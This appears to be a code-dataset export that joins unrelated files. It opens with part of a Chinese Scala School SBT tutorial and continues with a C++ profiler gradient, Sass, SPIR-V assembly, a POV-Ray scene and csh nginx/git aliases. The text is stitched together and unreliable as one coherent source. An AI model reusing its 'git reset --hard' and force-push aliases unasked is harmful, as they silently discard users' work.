[info] == copy-test-resources ==
[info] == copy-test-resources ==
[info]
[info] == test-compile ==
[info] Source analysis: 0 new/modified, 0 indirectly invalidated, 0 removed.
[info] Compiling test sources...
[info] Nothing to compile.
[info] Post-analysis: 0 classes.
[info] == test-compile ==
[info]
[info] == copy-resources ==
[info] == copy-resources ==
[info]
[info] == console ==
[info] Starting scala interpreter...
[info]
Welcome to Scala version 2.8.1.final (Java HotSpot(TM) 64-Bit Server VM, Java 1.6.0_22).
Type in expressions to have them evaluated.
Type :help for more information.
scala>
</pre>
我们代码编译通过了,并提供了典型的Scala提示符。我们将创建一个新的解析器,一个tweet以确保其“能工作”
<pre>
scala> import com.twitter.sample._
import com.twitter.sample._
scala> val tweet = """{"id":1,"text":"foo"}"""
tweet: java.lang.String = {"id":1,"text":"foo"}
scala> val parser = new SimpleParser
parser: com.twitter.sample.SimpleParser = com.twitter.sample.SimpleParser@71060c3e
scala> parser.parse(tweet)
res0: Option[com.twitter.sample.SimpleParsed] = Some(SimpleParsed(1,"foo"))
scala>
</pre>
h2. 添加依赖
我们简单的解析器对这个非常小的输入集工作正常,但我们需要添加更多的测试并让它出错。第一步是在我们的项目中添加specs测试库和一个真正的JSON解析器。要做到这一点,我们必须超越默认的SBT项目布局来创建一个项目。
SBT认为project/build目录中的Scala文件是项目定义。添加以下内容到这个文件中project/build/SampleProject.scala
<pre>
import sbt._
class SampleProject(info: ProjectInfo) extends DefaultProject(info) {
val jackson = "org.codehaus.jackson" % "jackson-core-asl" % "1.6.1"
val specs = "org.scala-tools.testing" % "specs_2.8.0" % "1.6.5" % "test"
}
</pre>
一个项目定义是一个SBT类。在上面例子中,我们扩展了SBT的DefaultProject。
这里是通过val声明依赖。SBT使用反射来扫描项目中的所有val依赖,并在构建时建立依赖关系树。这里使用的语法可能是新的,但本质和Maven依赖是相同的
<pre>
<dependency>
<groupId>org.codehaus.jackson</groupId>
<artifactId>jackson-core-asl</artifactId>
<version>1.6.1</version>
</dependency>
<dependency>
<groupId>org.scala-tools.testing</groupId>
<artifactId>specs_2.8.0</artifactId>
<version>1.6.5</version>
<scope>test</scope>
</dependency>
</pre>
现在可以下载我们的项目依赖了。在命令行中(而不是sbt console中)运行sbt update
<pre>
[local ~/projects/sbt-sample]$ sbt update
[info] Building project sample 1.0-SNAPSHOT against Scala 2.8.1
[info] using SampleProject with sbt 0.7.4 and Scala 2.7.7
[info]
[info] == update ==
[info] :: retrieving :: com.twitter#sample_2.8.1 [sync]
[info] confs: [compile, runtime, test, provided, system, optional, sources, javadoc]
[info] 1 artifacts copied, 0 already retrieved (2785kB/71ms)
[info] == update ==
[success] Successful.
[info]
[info] Total time: 1 s, completed Nov 24, 2010 8:47:26 AM
[info]
[info] Total session time: 2 s, completed Nov 24, 2010 8:47:26 AM
[success] Build completed successfully.
</pre>
你会看到sbt检索到specs库。现在还增加了一个lib_managed目录,并且在lib_managed/scala_2.8.1/test目录中包含 specs_2.8.0-1.6.5.jar
h2. 添加测试
现在有了测试库,可以把下面的测试代码写入src/test/scala/com/twitter/sample/SimpleParserSpec.scala文件
<pre>
package com.twitter.sample
import org.specs._
object SimpleParserSpec extends Specification {
"SimpleParser" should {
val parser = new SimpleParser()
"work with basic tweet" in {
val tweet = """{"id":1,"text":"foo"}"""
parser.parse(tweet) match {
case Some(parsed) => {
parsed.text must be_==("foo")
parsed.id must be_==(1)
}
case _ => fail("didn't parse tweet")
}
}
}
}
</pre>
在SBT控制台中运行test
<pre>
> test
[info]
[info] == compile ==
[info] Source analysis: 0 new/modified, 0 indirectly invalidated, 0 removed.
[info] Compiling main sources...
[info] Nothing to compile.
[info] Post-analysis: 3 classes.
[info] == compile ==
[info]
[info] == test-compile ==
[info] Source analysis: 0 new/modified, 0 indirectly invalidated, 0 removed.
[info] Compiling test sources...
[info] Nothing to compile.
[info] Post-analysis: 10 classes.
[info] == test-compile ==
[info]
[info] == copy-test-resources ==
[info] == copy-test-resources ==
[info]
[info] == copy-resources ==
[info] == copy-resources ==
[info]
[info] == test-start ==
[info] == test-start ==
[info]
[info] == com.twitter.sample.SimpleParserSpec ==
[info] SimpleParserSpec
[info] SimpleParser should
[info] + work with basic tweet
[info] == com.twitter.sample.SimpleParserSpec ==
[info]
[info] == test-complete ==
[info] == test-complete ==
[info]
[info] == test-finish ==
[info] Passed: : Total 1, Failed 0, Errors 0, Passed 1, Skipped 0
[info]
[info] All tests PASSED.
[info] == test-finish ==
[info]
[info] == test-cleanup ==
[info] == test-cleanup ==
[info]
[info] == test ==
[info] == test ==
[success] Successful.
[info]
[info] Total time: 0 s, completed Nov 24, 2010 8:54:45 AM
>
</pre>
我们的测试通过了!现在,我们可以增加更多。运行触发动作是SBT提供的优秀特性之一。在动作开始添加一个波浪线会启动一个循环,在源文件发生变化时重新运行动作。让我们运行 ~test 并看看会发生什么吧。
<pre>
[info] == test ==
[success] Successful.
[info]
[info] Total time: 0 s, completed Nov 24, 2010 8:55:50 AM
1. Waiting for source changes... (press enter to interrupt)
</pre>
现在,让我们添加下面的测试案例
<pre>
"reject a non-JSON tweet" in {
val tweet = """"id":1,"text":"foo""""
parser.parse(tweet) match {
case Some(parsed) => fail("didn't reject a non-JSON tweet")
case e => e must be_==(None)
}
}
"ignore nested content" in {
val tweet = """{"id":1,"text":"foo","nested":{"id":2}}"""
parser.parse(tweet) match {
case Some(parsed) => {
parsed.text must be_==("foo")
parsed.id must be_==(1)
}
case _ => fail("didn't parse tweet")
}
}
"fail on partial content" in {
val tweet = """{"id":1}"""
parser.parse(tweet) match {
case Some(parsed) => fail("didn't reject a partial tweet")
case e => e must be_==(None)
}
}
</pre>
在我们保存文件后,SBT会检测到变化,运行测试,并通知我们的解析器有问题
<pre>
[info] == com.twitter.sample.SimpleParserSpec ==
[info] SimpleParserSpec
[info] SimpleParser should
[info] + work with basic tweet
[info] x reject a non-JSON tweet
[info] didn't reject a non-JSON tweet (Specification.scala:43)
[info] x ignore nested content
[info] 'foo","nested":{"id' is not equal to 'foo' (SimpleParserSpec.scala:31)
[info] + fail on partial content
</pre>
因此,让我们返工实现真正的JSON解析器
<pre>
package com.twitter.sample
import org.codehaus.jackson._
import org.codehaus.jackson.JsonToken._
case class SimpleParsed(id: Long, text: String)
class SimpleParser {
val parserFactory = new JsonFactory()
def parse(str: String) = {
val parser = parserFactory.createJsonParser(str)
if (parser.nextToken() == START_OBJECT) {
var token = parser.nextToken()
var textOpt:Option[String] = None
var idOpt:Option[Long] = None
while(token != null) {
if (token == FIELD_NAME) {
parser.getCurrentName() match {
case "text" => {
parser.nextToken()
textOpt = Some(parser.getText())
}
case "id" => {
parser.nextToken()
idOpt = Some(parser.getLongValue())
}
case _ => // noop
}
}
token = parser.nextToken()
}
if (textOpt.isDefined && idOpt.isDefined) {
Some(SimpleParsed(idOpt.get, textOpt.get))
} else {
None
}
} else {
None
}
}
}
</pre>
这是一个简单的Jackson解析器。当我们保存,SBT会重新编译代码和运行测试。代码变得越来越好了!
<pre>
info] SimpleParser should
[info] + work with basic tweet
[info] + reject a non-JSON tweet
[info] x ignore nested content
[info] '2' is not equal to '1' (SimpleParserSpec.scala:32)
[info] + fail on partial content
[info] == com.twitter.sample.SimpleParserSpec ==
</pre>
哦。我们需要检查嵌套对象。让我们在token读取循环处添加一些丑陋的守卫。
<pre>
def parse(str: String) = {
val parser = parserFactory.createJsonParser(str)
var nested = 0
if (parser.nextToken() == START_OBJECT) {
var token = parser.nextToken()
var textOpt:Option[String] = None
var idOpt:Option[Long] = None
while(token != null) {
if (token == FIELD_NAME && nested == 0) {
parser.getCurrentName() match {
case "text" => {
parser.nextToken()
textOpt = Some(parser.getText())
}
case "id" => {
parser.nextToken()
idOpt = Some(parser.getLongValue())
}
case _ => // noop
}
} else if (token == START_OBJECT) {
nested += 1
} else if (token == END_OBJECT) {
nested -= 1
}
token = parser.nextToken()
}
if (textOpt.isDefined && idOpt.isDefined) {
Some(SimpleParsed(idOpt.get, textOpt.get))
} else {
None
}
} else {
None
}
}
</pre>
...测试通过了!
h2. 打包和发布
现在我们已经可以运行package命令来生成一个jar文件。不过我们可能要与其他组分享我们的jar包。要做到这一点,我们将在StandardProject基础上构建,这给了我们一个良好的开端。
第一步是引入StandardProject为SBT插件。插件是一种为你的构建引进依赖的方式,注意不是为你的项目引入。这些依赖关系定义在project/plugins/Plugins.scala文件中。添加以下代码到Plugins.scala文件中。
<pre>
import sbt._
class Plugins(info: ProjectInfo) extends PluginDefinition(info) {
val twitterMaven = "twitter.com" at "https://maven.twttr.com/"
val defaultProject = "com.twitter" % "standard-project" % "0.7.14"
}
</pre>
注意我们指定了一个Maven仓库和一个依赖。这是因为这个标准项目库是由twitter托管的,不在SBT默认检查的仓库中。
我们也将更新项目定义来扩展StandardProject,包括SVN发布特质,和我们希望发布的仓库定义。修改SampleProject.scala
<pre>
import sbt._
import com.twitter.sbt._
class SampleProject(info: ProjectInfo) extends StandardProject(info) with SubversionPublisher {
val jackson = "org.codehaus.jackson" % "jackson-core-asl" % "1.6.1"
val specs = "org.scala-tools.testing" % "specs_2.8.0" % "1.6.5" % "test"
override def subversionRepository = Some("https://svn.local.twitter.com/maven/")
}
</pre>
现在如果我们运行发布操作,将看到以下输出
<pre>
[info] == deliver ==
IvySvn Build-Version: null
IvySvn Build-DateTime: null
[info] :: delivering :: com.twitter#sample;1.0-SNAPSHOT :: 1.0-SNAPSHOT :: release :: Wed Nov 24 10:26:45 PST 2010
[info] delivering ivy file to /Users/mmcbride/projects/sbt-sample/target/ivy-1.0-SNAPSHOT.xml
[info] == deliver ==
[info]
[info] == make-pom ==
[info] Wrote /Users/mmcbride/projects/sbt-sample/target/sample-1.0-SNAPSHOT.pom
[info] == make-pom ==
[info]
[info] == publish ==
[info] :: publishing :: com.twitter#sample
[info] Scheduling publish to https://svn.local.twitter.com/maven/com/twitter/sample/1.0-SNAPSHOT/sample-1.0-SNAPSHOT.jar
[info] published sample to com/twitter/sample/1.0-SNAPSHOT/sample-1.0-SNAPSHOT.jar
[info] Scheduling publish to https://svn.local.twitter.com/maven/com/twitter/sample/1.0-SNAPSHOT/sample-1.0-SNAPSHOT.pom
[info] published sample to com/twitter/sample/1.0-SNAPSHOT/sample-1.0-SNAPSHOT.pom
[info] Scheduling publish to https://svn.local.twitter.com/maven/com/twitter/sample/1.0-SNAPSHOT/ivy-1.0-SNAPSHOT.xml
[info] published ivy to com/twitter/sample/1.0-SNAPSHOT/ivy-1.0-SNAPSHOT.xml
[info] Binary diff deleting com/twitter/sample/1.0-SNAPSHOT
[info] Commit finished r977 by 'mmcbride' at Wed Nov 24 10:26:47 PST 2010
[info] Copying from com/twitter/sample/.upload to com/twitter/sample/1.0-SNAPSHOT
[info] Binary diff finished : r978 by 'mmcbride' at Wed Nov 24 10:26:47 PST 2010
[info] == publish ==
[success] Successful.
[info]
[info] Total time: 4 s, completed Nov 24, 2010 10:26:47 AM
</pre>
这样(一段时间后),就可以在 <a href="https://binaries.local.twitter.com/maven/com/twitter/sample/1.0-SNAPSHOT/">binaries.local.twitter.com</a> 上看到我们发布的jar包。
h2. 添加任务
任务就是Scala函数。添加一个任务最简单的方法是,在你的项目定义中引入一个val定义的任务方法,如
<pre>
lazy val print = task {log.info("a test action"); None}
</pre>
你也可以这样加上依赖和描述
<pre>
lazy val print = task {log.info("a test action"); None}.dependsOn(compile) describedAs("prints a line after compile")
</pre>
刷新项目,并执行print操作,我们将看到以下输出
<pre>
> print
[info]
[info] == print ==
[info] a test action
[info] == print ==
[success] Successful.
[info]
[info] Total time: 0 s, completed Nov 24, 2010 11:05:12 AM
>
</pre>
所以它起作用了。如果你只是在一个项目定义一个任务的话,这工作得很好。然而如果你定义的是一个插件的话,它就很不灵活了。我可能要
<pre>
lazy val print = printAction
def printAction = printTask.dependsOn(compile) describedAs("prints a line after compile")
def printTask = task {log.info("a test action"); None}
</pre>
这可以让消费者覆盖任务本身,依赖和/或任务的描述,或动作本身。大多数SBT内建的动作都遵循这种模式。作为一个例子,我们可以通过修改内置打包任务来打印当前时间戳
<pre>
lazy val printTimestamp = task { log.info("current time is " + System.currentTimeMillis); None}
override def packageAction = super.packageAction.dependsOn(printTimestamp)
</pre>
有很多例子介绍了怎样调整SBT默认的StandardProject,和如何添加自定义任务。
h2. 快速参考
h3. 常用命令
* actions - 显示这个项目中可用的动作
* update - 下载依赖
* compile - 编译源文件
* test - 运行测试
* package - 创建一个可发布的jar文件
* publish-local - 在本地ivy缓存中安装构建好的jar包
* publish - 将你的jar推到一个远程库中(如果配置了的话)
h3. 更多命令
* test-failed - 运行所有失败的规格测试
* test-quick - 运行任何失败的和/或依赖更新的规格
* clean-cache - 删除SBT缓存各种的东西。就像sbt的clean命令
* clean-lib - 删除lib_managed下的一切
h3. 项目布局
待续
| Textile | 5 | AstronomiaDev/scala_school | web/zh_cn/sbt.textile | [
"Apache-2.0"
] |
/*
* Copyright (c) 2020, Andreas Kling <kling@serenityos.org>
*
* SPDX-License-Identifier: BSD-2-Clause
*/
#include "Gradient.h"
#include <LibGUI/Painter.h>
namespace Profiler {
static Gfx::Bitmap const& heat_gradient()
{
static RefPtr<Gfx::Bitmap> bitmap;
if (!bitmap) {
bitmap = Gfx::Bitmap::try_create(Gfx::BitmapFormat::BGRx8888, { 101, 1 }).release_value_but_fixme_should_propagate_errors();
GUI::Painter painter(*bitmap);
painter.fill_rect_with_gradient(Orientation::Horizontal, bitmap->rect(), Color::from_rgb(0xffc080), Color::from_rgb(0xff3000));
}
return *bitmap;
}
Color color_for_percent(u8 percent)
{
VERIFY(percent <= 100);
return heat_gradient().get_pixel(percent, 0);
}
}
| C++ | 4 | densogiaichned/serenity | Userland/DevTools/Profiler/Gradient.cpp | [
"BSD-2-Clause"
] |
.root
&:not(:last-child):not(:last-of-type)
margin-bottom: var(--spacing-md)
padding-bottom: var(--spacing-md)
border-bottom: 1px dotted var(--color-subtle)
.hr
border: 0
padding: var(--spacing-sm) 0
| Sass | 2 | snosrap/spaCy | website/src/styles/section.module.sass | [
"MIT"
] |
; SPIR-V
; Version: 1.0
; Generator: Khronos Glslang Reference Front End; 7
; Bound: 35
; Schema: 0
OpCapability Shader
%1 = OpExtInstImport "GLSL.std.450"
OpMemoryModel Logical GLSL450
OpEntryPoint Fragment %main "main" %FragColor
OpExecutionMode %main OriginUpperLeft
OpSource GLSL 450
OpName %main "main"
OpName %foo "foo"
OpName %FragColor "FragColor"
OpDecorate %FragColor Location 0
%void = OpTypeVoid
%3 = OpTypeFunction %void
%float = OpTypeFloat 32
%_ptr_Function_float = OpTypePointer Function %float
%float_1 = OpConstant %float 1
%float_2 = OpConstant %float 2
%bool = OpTypeBool
%false = OpConstantFalse %bool
%float_3 = OpConstant %float 3
%float_4 = OpConstant %float 4
%float_5 = OpConstant %float 5
%_ptr_Output_float = OpTypePointer Output %float
%FragColor = OpVariable %_ptr_Output_float Output
%main = OpFunction %void None %3
%5 = OpLabel
%foo = OpVariable %_ptr_Function_float Function
OpStore %foo %float_1
OpBranch %10
%10 = OpLabel
OpLoopMerge %12 %13 None
OpBranch %11
%11 = OpLabel
OpBranch %13
%13 = OpLabel
OpStore %foo %float_2
OpBranchConditional %false %10 %12
%12 = OpLabel
OpBranch %17
%17 = OpLabel
OpLoopMerge %19 %20 None
OpBranch %18
%18 = OpLabel
OpBranch %20
%20 = OpLabel
OpStore %foo %float_3
OpBranchConditional %false %17 %19
%19 = OpLabel
OpBranch %22
%22 = OpLabel
OpLoopMerge %24 %25 None
OpBranch %23
%23 = OpLabel
OpBranch %25
%25 = OpLabel
OpStore %foo %float_4
OpBranchConditional %false %22 %24
%24 = OpLabel
OpBranch %27
%27 = OpLabel
OpLoopMerge %29 %30 None
OpBranch %28
%28 = OpLabel
OpBranch %30
%30 = OpLabel
OpStore %foo %float_5
OpBranchConditional %false %27 %29
%29 = OpLabel
%34 = OpLoad %float %foo
OpStore %FragColor %34
OpReturn
OpFunctionEnd
| GLSL | 3 | Alan-love/filament | third_party/spirv-cross/shaders/asm/frag/do-while-statement-fallback.asm.frag | [
"Apache-2.0"
] |
global_settings {
assumed_gamma 1.0
noise_generator 1
}
// Camera
camera {
location <0, 10, -3>
look_at <0, 11, 0>
angle 90
}
// Sunlight
light_source {
<2000, 2000, -2000>
color rgb <1, 1, 1>
}
// Blue sky
plane {
y, 10000
hollow
pigment {
color rgb <0.05, 0.25, 0.6>
}
finish {
ambient 1
diffuse 0
}
}
// Clouds
plane{
y, 1
hollow
pigment {
bozo
turbulence 0.65
omega 0.7
lambda 2.5
octaves 10
color_map {
[0.0 color rgb <0.7, 0.7, 0.7>]
[0.1 color rgb <1, 1, 1>]
[0.5 color rgbt <1, 1, 1, 1>]
[1.0 color rgbt <1, 1, 1, 1>]
}
}
finish {
ambient 1
diffuse 0
}
scale 1000
}
// Fog
fog {
distance 300000
color rgb <1, 1, 1>
}
// Field
plane {
y, 0
pigment {
color rgb <0.28, 0.52, 0.00>
}
normal {
bumps 0.75
scale 0.02
}
}
| POV-Ray SDL | 4 | spcask/pov-ray-tracing | src/scene22.pov | [
"MIT"
] |
### GNU/LINUX
alias ng.status systemctl status nginx
alias ng.reload systemctl reload nginx
alias ng.restart systemctl restart nginx
alias ng.test '/usr/sbin/nginx -t -c /etc/nginx/nginx.conf'
alias ng.dump '/usr/sbin/nginx -T -c /etc/nginx/nginx.conf'
alias CD_NGX_ROOT 'cd /etc/nginx && ls -lh'
alias CD_NGX_LOGS 'cd /var/log/nginx && ls -lh'
alias CD_NGX_ACME 'cd /var/www/acme/.well-known/acme-challenge && ls -lh'
### BSD
alias ng.status /usr/local/etc/rc.d/nginx status
alias ng.reload /usr/local/etc/rc.d/nginx reload
alias ng.restart /usr/local/etc/rc.d/nginx restart
alias ng.test '/usr/local/sbin/nginx -t -c /usr/local/etc/nginx/nginx.conf'
alias ng.dump '/usr/local/sbin/nginx -T -c /usr/local/etc/nginx/nginx.conf'
alias CD_NGX_ROOT 'cd /usr/local/etc/nginx && ls -lh'
alias CD_NGX_LOGS 'cd /var/log/nginx && ls -lh'
alias CD_NGX_ACME 'cd /var/www/acme/.well-known/acme-challenge && ls -lh'
### GIT
alias git.log 'git log --oneline --decorate --graph --all'
alias git.commit 'git add . && git commit -m "uncommited changes"'
alias git.sync 'git pull origin master && git fetch --all && git fetch --prune --tags'
alias git.push 'git push origin master && git push origin --tags --force'
alias git.force 'git push origin master --force && git push origin --tags --force'
alias git.remote 'git remote update && git status -uno && git show-branch *master'
alias git.reset 'git add . && git reset --hard HEAD'
### OTHER
alias http.server 'python3 -m http.server 8080 --bind 127.0.0.1'
| Tcsh | 3 | Muzsor/nginx-admins-handbook | lib/nginx/snippets/skel/global-aliases.csh | [
"MIT"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.